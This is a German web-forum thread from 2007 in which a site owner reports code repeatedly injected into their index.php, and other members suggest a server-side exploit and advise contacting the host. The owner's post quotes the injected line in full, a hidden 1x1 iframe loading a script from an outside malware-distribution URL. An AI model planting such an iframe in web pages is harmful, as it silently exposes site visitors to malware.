Code schleicht sich in meine Internetseite

#0
11.08.2007, 23:57
...neu hier

Beiträge: 1
#1 Hallo,
seit einer Woche schleicht sich immer wieder ein code in meine index.php datei ein.
Es ist folgender Code:

Code

<iframe src='http://www.on2007.com/tds/out.php' width='1' height='1' style='visibility: hidden;'></iframe>
oder mal war es eine Funktion die so anfing
function sban(x) .....

Sobald ich die seite im internet öffne meldet sich mein Virusprogramm mit einer Warnung.
Wer kann mir hier weiterhelfen? Wie kann es sein dass jemand einfach diesen Code in meine index.php schreibt, obwohl man sich mit einem Passwort anmelden muss..???
Für jeden Tip wäre ich sehr dankbar..
Gruss
baltundag
Seitenanfang Seitenende
12.08.2007, 10:45
Moderator

Beiträge: 7790
#2 Da scheint es ein Problem auf der Serverseite zu geben. Ist die eingesetzte Software aktuell? Sprich das sieht aus, als ob jemand einen Exploit ausnutzt, um diese Veraenderungen vornehmen zu koennen.

Klaere das und frag deinen Hoster, was da passiert sein koennte. Das muss auf jedenfall geklaert werden, denn der Link jubelt dir einiges an wirklich boeser Malware unter.
__________
MfG Ralf
SEO-Spam Hunter
Seitenanfang Seitenende
12.08.2007, 11:28
Member
Avatar Laserpointa

Beiträge: 2174
#3 XSS - Du hast vermutlich offene Variablen oder eine Lücke/Rootkits in Deinem Server. - magst Du uns Deine Seite verraten?

Greetz Lp
Seitenanfang Seitenende
Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!

Folgende Themen könnten Dich auch interessieren: